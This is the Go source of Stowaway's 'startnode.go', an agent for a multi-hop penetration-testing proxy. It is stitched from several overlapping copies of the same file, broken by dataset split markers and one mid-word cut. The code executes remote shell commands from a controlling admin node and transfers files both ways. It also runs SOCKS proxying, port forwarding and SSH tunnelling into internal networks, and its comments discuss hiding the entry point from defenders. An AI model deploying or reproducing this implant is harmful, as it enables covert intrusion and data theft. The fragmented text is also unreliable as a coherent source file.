SocksDataChanMap.Unlock()
case "FIN":
CurrentConn.Lock()
if _, ok := CurrentConn.Payload[AdminData.Clientid]; ok {
CurrentConn.Payload[AdminData.Clientid].Close()
delete(CurrentConn.Payload, AdminData.Clientid)
}
CurrentConn.Unlock()
SocksDataChanMap.Lock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "HEARTBEAT":
hbdatapack, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "KEEPALIVE", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- hbdatapack
default:
continue
}
case "COMMAND":
switch AdminData.Command {
case "SHELL":
switch AdminData.Info {
case "":
stdout, stdin = CreatInteractiveShell()
go func() {
StartShell("", stdin, stdout, NODEID)
}()
case "exit\n":
fallthrough
default:
go func() {
StartShell(AdminData.Info, stdin, stdout, NODEID)
}()
}
case "SOCKS":
socksinfo := strings.Split(AdminData.Info, ":::")
SocksInfo.SocksUsername = socksinfo[1]
SocksInfo.SocksPass = socksinfo[2]
StartSocks()
case "SOCKSOFF":
case "SSH":
err := StartSSH(AdminData.Info, NODEID)
if err == nil {
go ReadCommand()
} else {
break
}
case "SSHCOMMAND":
go WriteCommand(AdminData.Info)
case "SSHTUNNEL":
err := SSHTunnelNextNode(AdminData.Info, NODEID)
if err != nil {
fmt.Println("[*]", err)
break
}
case "CONNECT":
var status bool = false
command := strings.Split(AdminData.Info, ":::")
addr := command[0]
choice := command[1]
if choice == "1" { //连接的节点是否是在reuseport?
status = node.ConnectNextNodeReuse(addr, NODEID, AgentStatus.AESKey)
} else {
status = node.ConnectNextNode(addr, NODEID, AgentStatus.AESKey)
}
if !status {
message, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NODECONNECTFAIL", " ", "", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- message
}
case "FILENAME":
var err error
UploadFile, err := os.Create(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "CREATEFAIL", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NAMECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go share.ReceiveFile("", connToAdmin, FileDataMap, CannotRead, UploadFile, AgentStatus.AESKey, false, NODEID)
}
case "FILESIZE":
filesize, _ := strconv.ParseInt(AdminData.Info, 10, 64)
share.File.FileSize = filesize
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESIZECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSize <- true
case "FILESLICENUM":
share.File.TotalSilceNum, _ = strconv.Atoi(AdminData.Info)
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESLICENUMCONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSliceNum <- true
case "FILESLICENUMCONFIRM":
share.File.TotalConfirm <- true
case "FILESIZECONFIRM":
share.File.TotalConfirm <- true
case "DOWNLOADFILE":
go share.UploadFile("", AdminData.Info, connToAdmin, utils.AdminId, GetName, AgentStatus.AESKey, NODEID, false)
case "NAMECONFIRM":
GetName <- true
case "CREATEFAIL":
GetName <- false
case "CANNOTREAD":
CannotRead <- true
share.File.ReceiveFileSliceNum <- false
os.Remove(AdminData.Info) //删除空文件
case "FORWARDTEST":
go TestForward(AdminData.Info)
case "REFLECTTEST":
go TestReflect(AdminData.Info)
case "REFLECTNUM":
ReflectStatus.ReflectNum <- AdminData.Clientid
case "STOPREFLECT":
ReflectConnMap.Lock()
for key, conn := range ReflectConnMap.Payload {
conn.Close()
delete(ForwardConnMap.Payload, key)
}
ReflectConnMap.Unlock()
for _, listener := range CurrentPortReflectListener {
listener.Close()
}
case "LISTEN":
err := TestListen(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "FAILED", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "SUCCESS", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go node.StartNodeListen(AdminData.Info, NODEID, AgentStatus.AESKey)
}
case "YOURINFO": //接收note
AgentStatus.NodeNote = AdminData.Info
case "KEEPALIVE":
default:
continue
}
}
} else {
// 检查是否是admin发来的,分配给自己子节点的ID命令,是的话将admin分配的序号记录
if AdminData.Route == "" && AdminData.Command == "ID" {
AgentStatus.WaitForIDAllocate <- AdminData.NodeId //将此节点序号递交,以便启动HandleConnFromLowerNode函数
node.NodeInfo.LowerNode.Lock()
node.NodeInfo.LowerNode.Payload[AdminData.NodeId] = node.NodeInfo.LowerNode.Payload[utils.AdminId]
node.NodeInfo.LowerNode.Unlock()
}
routeid := ChangeRoute(AdminData) //更改路由并返回下一个路由点
proxyData, _ := utils.ConstructPayload(AdminData.NodeId, AdminData.Route, AdminData.Type, AdminData.Command, AdminData.FileSliceNum, AdminData.Info, AdminData.Clientid, AdminData.CurrentId, AgentStatus.AESKey, true)
passToLowerData := utils.NewPassToLowerNodeData()
if routeid == "" { //当返回的路由点为0,说明就是自己的子节点
passToLowerData.Route = AdminData.NodeId
} else { //不是0,说明不是自己的子节点,还需要一定轮数的递送
passToLowerData.Route = routeid
}
passToLowerData.Data = proxyData //封装结构体,交给HandleConnToLowerNode处理
ProxyChan.ProxyChanToLowerNode <- passToLowerData
}
}
}
| }
}
//管理admin端下发的数据
func HandleConnFromAdmin(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, N | identifier_body |
startnode.go | package agent
import (
"fmt"
"io"
"net"
"os"
"strconv"
"strings"
"Stowaway/node"
"Stowaway/share"
"Stowaway/utils"
)
//startnode启动代码
//todo:可以为startnode加入一个保护机制,在startnode启动时可以设置是否开启此机制
//即当有节点异常断线时,可设置是否让startnode暂时断开与第二级节点的连接
//防止异常断线是由于管理员发现节点引起的,并根据connection进行逐点反查从而顺藤摸瓜找到入口点startnode,使得渗透测试者失去内网的入口点
//先暂时不加入,权当一个胡思乱想的idea,今后可视情况增加对startnode保护机制的处理代码,使得入口点更加稳固和隐蔽
func HandleStartNodeConn(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
go HandleConnFromAdmin(connToAdmin, monitor, listenPort, reConn, passive, NODEID)
go HandleConnToAdmin(connToAdmin)
}
//管理startnode发往admin的数据
func HandleConnToAdmin(connToAdmin *net.Conn) {
for {
proxyData := <-ProxyChan.ProxyChanToUpperNode
_, err := (*connToAdmin).Write(proxyData)
if err != nil {
continue
}
}
}
//管理admin端下发的数据
func HandleConnFromAdmin(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
var (
CannotRead = make(chan bool, 1)
GetName = make(chan bool, 1)
stdin io.Writer
stdout io.Reader
)
for {
AdminData, err := utils.ExtractPayload(*connToAdmin, AgentStatus.AESKey, NODEID, false)
if err != nil {
AdminOffline(reConn, monitor, listenPort, passive)
go SendInfo(NODEID) //重连后发送自身信息
go SendNote(NODEID) //重连后发送admin设置的备忘
continue
}
if AdminData.NodeId == NODEID {
switch AdminData.Type {
case "DATA":
switch AdminData.Command {
case "SOCKSDATA":
SocksDataChanMap.RLock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.RUnlock()
} else {
SocksDataChanMap.RUnlock()
SocksDataChanMap.Lock()
SocksDataChanMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HanleClientSocksConn(SocksDataChanMap.Payload[AdminData.Clientid], SocksInfo.SocksUsername, SocksInfo.SocksPass, AdminData.Clientid, NODEID)
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.Unlock()
}
case "FILEDATA": //接收文件内容
slicenum, _ := strconv.Atoi(AdminData.FileSliceNum)
FileDataMap.Lock()
FileDataMap.Payload[slicenum] = AdminData.Info
FileDataMap.Unlock()
case "FORWARD":
TryForward(AdminData.Info, AdminData.Clientid)
case "FORWARDDATA":
ForwardConnMap.RLock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
} else {
PortFowardMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HandleForward(PortFowardMap.Payload[AdminData.Clientid], AdminData.Clientid)
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
}
PortFowardMap.Unlock()
}
ForwardConnMap.RUnlock()
case "FORWARDFIN":
ForwardConnMap.Lock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
ForwardConnMap.Payload[AdminData.Clientid].Close()
delete(ForwardConnMap.Payload, AdminData.Clientid)
}
ForwardConnMap.Unlock()
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
close(PortFowardMap.Payload[AdminData.Clientid])
}
delete(PortFowardMap.Payload, AdminData.Clientid)
}
}
PortFowardMap.Unlock()
case "REFLECTDATARESP":
ReflectConnMap.Lock()
ReflectConnMap.Payload[AdminData.Clientid].Write([]byte(AdminData.Info))
ReflectConnMap.Unlock()
case "REFLECTTIMEOUT":
fallthrough
case "REFLECTOFFLINE":
ReflectConnMap.Lock()
if _, ok := ReflectConnMap.Payload[AdminData.Clientid]; ok {
ReflectConnMap.Payload[AdminData.Clientid].Close()
delete(ReflectConnMap.Payload, AdminData.Clientid)
}
ReflectConnMap.Unlock()
case "FINOK":
SocksDataChanMap.Lock() //性能损失?
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "FIN":
CurrentConn.Lock()
if _, ok := CurrentConn.Payload[AdminData.Clientid]; ok {
CurrentConn.Payload[AdminData.Clientid].Close()
delete(CurrentConn.Payload, AdminData.Clientid)
}
CurrentConn.Unlock()
SocksDataChanMap.Lock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "HEARTBEAT":
hbdatapack, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "KEEPALIVE", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- hbdatapack
default:
continue
}
case "COMMAND":
switch AdminData.Command {
case "SHELL":
switch AdminData.Info {
case "":
stdout, stdin = CreatInteractiveShell()
go func() {
StartShell("", stdin, stdout, NODEID)
}()
case "exit\n":
fallthrough
default:
go func() {
StartShell(AdminData.Info, stdin, stdout, NODEID)
}()
}
case "SOCKS":
socksinfo := strings.Split(AdminData.Info, ":::")
SocksInfo.SocksUsername = socksinfo[1]
SocksInfo.SocksPass = socksinfo[2]
StartSocks()
case "SOCKSOFF":
case "SSH":
err := StartSSH(AdminData.Info, NODEID)
if err == nil {
go ReadCommand()
} else {
break
}
case "SSHCOMMAND":
go WriteCommand(AdminData.Info)
case "SSHTUNNEL":
err := SSHTunnelNextNode(AdminData.Info, NODEID)
if err != nil {
fmt.Println("[*]", err)
break
}
case "CONNECT":
var status bool = false
command := strings.Split(AdminData.Info, ":::")
addr := command[0]
choice := command[1]
if choice == "1" { //连接的节点是否是在reuseport?
status = node.ConnectNextNodeReuse(addr, NODEID, AgentStatus.AESKey)
} else {
status = node.ConnectNextNode(addr, NODEID, AgentStatus.AESKey)
}
if !status {
message, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NODECONNECTFAIL", " ", "", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- message
}
case "FILENAME":
var err error
UploadFile, err := os.Create(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "CREATEFAIL", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NAMECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go share.ReceiveFile("", connToAdmin, FileDataMap, CannotRead, UploadFile, AgentStatus.AESKey, false, NODEID)
}
case "FILESIZE":
filesize, _ := strconv.ParseInt(AdminData.Info, 10, 64)
share.File.FileSize = filesize
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESIZECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSize <- true
case "FILESLICENUM":
share.File.TotalSilceNum, _ = strconv.Atoi(AdminData.Info)
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESLICENUMCONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSliceNum <- true
case "FILESLICENUMCONFIRM":
share.File.TotalConfirm <- true
case "FILESIZECONFIRM":
share.File.TotalConfirm <- true
case "DOWNLOADFILE":
go share.UploadFile("", AdminData.Info, connToAdmin, utils.AdminId, GetName, AgentStatus.AESKey, NODEID, false)
case "NAMECONFIRM":
GetName <- true
case "CREATEFAIL":
GetName <- false
case "CANNOTREAD":
CannotRead <- true
share.File.ReceiveFileSliceNum <- false
os.Remove(AdminData.Info) //删除空文件
case "FORWARDTEST":
go TestForward(AdminData.Info)
case "REFLECTTEST":
go TestReflect(AdminData.Info)
case "REFLECTNUM":
ReflectStatus.ReflectNum <- AdminData.Clientid
case "STOPREFLECT":
ReflectConnMap.Lock()
for key, conn := range ReflectConnMap.Payload {
conn.Close()
delete(ForwardConnMap.Payload, key)
}
ReflectConnMap.Unlock()
for _, listener := range CurrentPortReflectListener {
listener.Close()
}
case "LISTEN":
err := TestListen(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "FAILED", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "SUCCESS", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go node.StartNodeListen(AdminData.Info, NODEID, AgentStatus.AESKey)
}
case "YOURINFO": //接收note
AgentStatus.NodeNote = AdminData.Info
case "KEEPALIVE":
default:
continue
}
} | } else {
// 检查是否是admin发来的,分配给自己子节点的ID命令,是的话将admin分配的序号记录
if AdminData.Route == "" && AdminData.Command == "ID" {
AgentStatus.WaitForIDAllocate <- AdminData.NodeId //将此节点序号递交,以便启动HandleConnFromLowerNode函数
node.NodeInfo.LowerNode.Lock()
node.NodeInfo.LowerNode.Payload[AdminData.NodeId] = node.NodeInfo.LowerNode.Payload[utils.AdminId]
node.NodeInfo.LowerNode.Unlock()
}
routeid := ChangeRoute(AdminData) //更改路由并返回下一个路由点
proxyData, _ := utils.ConstructPayload(AdminData.NodeId, AdminData.Route, AdminData.Type, AdminData.Command, AdminData.FileSliceNum, AdminData.Info, AdminData.Clientid, AdminData.CurrentId, AgentStatus.AESKey, true)
passToLowerData := utils.NewPassToLowerNodeData()
if routeid == "" { //当返回的路由点为0,说明就是自己的子节点
passToLowerData.Route = AdminData.NodeId
} else { //不是0,说明不是自己的子节点,还需要一定轮数的递送
passToLowerData.Route = routeid
}
passToLowerData.Data = proxyData //封装结构体,交给HandleConnToLowerNode处理
ProxyChan.ProxyChanToLowerNode <- passToLowerData
}
}
} | random_line_split | |
startnode.go | package agent
import (
"fmt"
"io"
"net"
"os"
"strconv"
"strings"
"Stowaway/node"
"Stowaway/share"
"Stowaway/utils"
)
//startnode启动代码
//todo:可以为startnode加入一个保护机制,在startnode启动时可以设置是否开启此机制
//即当有节点异常断线时,可设置是否让startnode暂时断开与第二级节点的连接
//防止异常断线是由于管理员发现节点引起的,并根据connection进行逐点反查从而顺藤摸瓜找到入口点startnode,使得渗透测试者失去内网的入口点
//先暂时不加入,权当一个胡思乱想的idea,今后可视情况增加对startnode保护机制的处理代码,使得入口点更加稳固和隐蔽
func HandleStartNodeConn(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
go HandleConnFromAdmin(connToAdmin, monitor, listenPort, reConn, passive, NODEID)
go HandleConnToAdmin(connToAdmin)
}
//管理startnode发往admin的数据
func HandleConnToAdmin(connToAdmin *net.Conn) {
for {
proxyData := <-ProxyChan.ProxyChanToUpperNode
_, err := (*connToAdmin).Write(proxyData)
if err != nil {
continue
}
}
}
//管理admin端下发的数据
func HandleConnFromAdmin(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
var (
CannotRead = make(chan bool, 1)
GetName = make(chan bool, 1)
stdin io.Writer
stdout io.Reader
)
for {
AdminData, err := utils.ExtractPayload(*connToAdmin, AgentStatus.AESKey, NODEID, false)
if err != nil {
AdminO | tor, listenPort, passive)
go SendInfo(NODEID) //重连后发送自身信息
go SendNote(NODEID) //重连后发送admin设置的备忘
continue
}
if AdminData.NodeId == NODEID {
switch AdminData.Type {
case "DATA":
switch AdminData.Command {
case "SOCKSDATA":
SocksDataChanMap.RLock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.RUnlock()
} else {
SocksDataChanMap.RUnlock()
SocksDataChanMap.Lock()
SocksDataChanMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HanleClientSocksConn(SocksDataChanMap.Payload[AdminData.Clientid], SocksInfo.SocksUsername, SocksInfo.SocksPass, AdminData.Clientid, NODEID)
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.Unlock()
}
case "FILEDATA": //接收文件内容
slicenum, _ := strconv.Atoi(AdminData.FileSliceNum)
FileDataMap.Lock()
FileDataMap.Payload[slicenum] = AdminData.Info
FileDataMap.Unlock()
case "FORWARD":
TryForward(AdminData.Info, AdminData.Clientid)
case "FORWARDDATA":
ForwardConnMap.RLock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
} else {
PortFowardMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HandleForward(PortFowardMap.Payload[AdminData.Clientid], AdminData.Clientid)
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
}
PortFowardMap.Unlock()
}
ForwardConnMap.RUnlock()
case "FORWARDFIN":
ForwardConnMap.Lock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
ForwardConnMap.Payload[AdminData.Clientid].Close()
delete(ForwardConnMap.Payload, AdminData.Clientid)
}
ForwardConnMap.Unlock()
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
close(PortFowardMap.Payload[AdminData.Clientid])
}
delete(PortFowardMap.Payload, AdminData.Clientid)
}
}
PortFowardMap.Unlock()
case "REFLECTDATARESP":
ReflectConnMap.Lock()
ReflectConnMap.Payload[AdminData.Clientid].Write([]byte(AdminData.Info))
ReflectConnMap.Unlock()
case "REFLECTTIMEOUT":
fallthrough
case "REFLECTOFFLINE":
ReflectConnMap.Lock()
if _, ok := ReflectConnMap.Payload[AdminData.Clientid]; ok {
ReflectConnMap.Payload[AdminData.Clientid].Close()
delete(ReflectConnMap.Payload, AdminData.Clientid)
}
ReflectConnMap.Unlock()
case "FINOK":
SocksDataChanMap.Lock() //性能损失?
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "FIN":
CurrentConn.Lock()
if _, ok := CurrentConn.Payload[AdminData.Clientid]; ok {
CurrentConn.Payload[AdminData.Clientid].Close()
delete(CurrentConn.Payload, AdminData.Clientid)
}
CurrentConn.Unlock()
SocksDataChanMap.Lock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "HEARTBEAT":
hbdatapack, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "KEEPALIVE", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- hbdatapack
default:
continue
}
case "COMMAND":
switch AdminData.Command {
case "SHELL":
switch AdminData.Info {
case "":
stdout, stdin = CreatInteractiveShell()
go func() {
StartShell("", stdin, stdout, NODEID)
}()
case "exit\n":
fallthrough
default:
go func() {
StartShell(AdminData.Info, stdin, stdout, NODEID)
}()
}
case "SOCKS":
socksinfo := strings.Split(AdminData.Info, ":::")
SocksInfo.SocksUsername = socksinfo[1]
SocksInfo.SocksPass = socksinfo[2]
StartSocks()
case "SOCKSOFF":
case "SSH":
err := StartSSH(AdminData.Info, NODEID)
if err == nil {
go ReadCommand()
} else {
break
}
case "SSHCOMMAND":
go WriteCommand(AdminData.Info)
case "SSHTUNNEL":
err := SSHTunnelNextNode(AdminData.Info, NODEID)
if err != nil {
fmt.Println("[*]", err)
break
}
case "CONNECT":
var status bool = false
command := strings.Split(AdminData.Info, ":::")
addr := command[0]
choice := command[1]
if choice == "1" { //连接的节点是否是在reuseport?
status = node.ConnectNextNodeReuse(addr, NODEID, AgentStatus.AESKey)
} else {
status = node.ConnectNextNode(addr, NODEID, AgentStatus.AESKey)
}
if !status {
message, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NODECONNECTFAIL", " ", "", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- message
}
case "FILENAME":
var err error
UploadFile, err := os.Create(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "CREATEFAIL", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NAMECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go share.ReceiveFile("", connToAdmin, FileDataMap, CannotRead, UploadFile, AgentStatus.AESKey, false, NODEID)
}
case "FILESIZE":
filesize, _ := strconv.ParseInt(AdminData.Info, 10, 64)
share.File.FileSize = filesize
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESIZECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSize <- true
case "FILESLICENUM":
share.File.TotalSilceNum, _ = strconv.Atoi(AdminData.Info)
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESLICENUMCONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSliceNum <- true
case "FILESLICENUMCONFIRM":
share.File.TotalConfirm <- true
case "FILESIZECONFIRM":
share.File.TotalConfirm <- true
case "DOWNLOADFILE":
go share.UploadFile("", AdminData.Info, connToAdmin, utils.AdminId, GetName, AgentStatus.AESKey, NODEID, false)
case "NAMECONFIRM":
GetName <- true
case "CREATEFAIL":
GetName <- false
case "CANNOTREAD":
CannotRead <- true
share.File.ReceiveFileSliceNum <- false
os.Remove(AdminData.Info) //删除空文件
case "FORWARDTEST":
go TestForward(AdminData.Info)
case "REFLECTTEST":
go TestReflect(AdminData.Info)
case "REFLECTNUM":
ReflectStatus.ReflectNum <- AdminData.Clientid
case "STOPREFLECT":
ReflectConnMap.Lock()
for key, conn := range ReflectConnMap.Payload {
conn.Close()
delete(ForwardConnMap.Payload, key)
}
ReflectConnMap.Unlock()
for _, listener := range CurrentPortReflectListener {
listener.Close()
}
case "LISTEN":
err := TestListen(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "FAILED", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "SUCCESS", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go node.StartNodeListen(AdminData.Info, NODEID, AgentStatus.AESKey)
}
case "YOURINFO": //接收note
AgentStatus.NodeNote = AdminData.Info
case "KEEPALIVE":
default:
continue
}
}
} else {
// 检查是否是admin发来的,分配给自己子节点的ID命令,是的话将admin分配的序号记录
if AdminData.Route == "" && AdminData.Command == "ID" {
AgentStatus.WaitForIDAllocate <- AdminData.NodeId //将此节点序号递交,以便启动HandleConnFromLowerNode函数
node.NodeInfo.LowerNode.Lock()
node.NodeInfo.LowerNode.Payload[AdminData.NodeId] = node.NodeInfo.LowerNode.Payload[utils.AdminId]
node.NodeInfo.LowerNode.Unlock()
}
routeid := ChangeRoute(AdminData) //更改路由并返回下一个路由点
proxyData, _ := utils.ConstructPayload(AdminData.NodeId, AdminData.Route, AdminData.Type, AdminData.Command, AdminData.FileSliceNum, AdminData.Info, AdminData.Clientid, AdminData.CurrentId, AgentStatus.AESKey, true)
passToLowerData := utils.NewPassToLowerNodeData()
if routeid == "" { //当返回的路由点为0,说明就是自己的子节点
passToLowerData.Route = AdminData.NodeId
} else { //不是0,说明不是自己的子节点,还需要一定轮数的递送
passToLowerData.Route = routeid
}
passToLowerData.Data = proxyData //封装结构体,交给HandleConnToLowerNode处理
ProxyChan.ProxyChanToLowerNode <- passToLowerData
}
}
}
| ffline(reConn, moni | identifier_name |
startnode.go | package agent
import (
"fmt"
"io"
"net"
"os"
"strconv"
"strings"
"Stowaway/node"
"Stowaway/share"
"Stowaway/utils"
)
//startnode启动代码
//todo:可以为startnode加入一个保护机制,在startnode启动时可以设置是否开启此机制
//即当有节点异常断线时,可设置是否让startnode暂时断开与第二级节点的连接
//防止异常断线是由于管理员发现节点引起的,并根据connection进行逐点反查从而顺藤摸瓜找到入口点startnode,使得渗透测试者失去内网的入口点
//先暂时不加入,权当一个胡思乱想的idea,今后可视情况增加对startnode保护机制的处理代码,使得入口点更加稳固和隐蔽
func HandleStartNodeConn(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
go HandleConnFromAdmin(connToAdmin, monitor, listenPort, reConn, passive, NODEID)
go HandleConnToAdmin(connToAdmin)
}
//管理startnode发往admin的数据
func HandleConnToAdmin(connToAdmin *net.Conn) {
for {
proxyData := <-ProxyChan.ProxyChanToUpperNode
_, err := (*connToAdmin).Write(proxyData)
if err != nil {
continue
}
}
}
//管理admin端下发的数据
func HandleConnFromAdmin(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
var (
CannotRead = make(chan bool, 1)
GetName = make(chan bool, 1)
stdin io.Writer
stdout io.Reader
)
for {
AdminData, err := utils.ExtractPayload(*connToAdmin, AgentStatus.AESKey, NODEID, false)
if err != nil {
AdminOffline(reConn, monitor, listenPort, passive)
go SendInfo(NODEID) //重连后发送自身信息
go SendNote(NODEID) //重连后发送admin设置的备忘
continue
}
if AdminData.NodeId == NODEID {
switch AdminData.Type {
case "DATA":
switch AdminData.Command {
case "SOCKSDATA":
SocksDataChanMap.RLock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.RUnlock()
} else {
SocksDataChanMap.RUnlock()
SocksDataChanMap.Lock()
SocksDataChanMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HanleClientSocksConn(SocksDataChanMap.Payload[AdminData.Clientid], SocksInfo.SocksUsername, SocksInfo.SocksPass, AdminData.Clientid, NODEID)
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.Unlock()
}
case "FILEDATA": //接收文件内容
slicenum, _ := strconv.Atoi(AdminData.FileSliceNum)
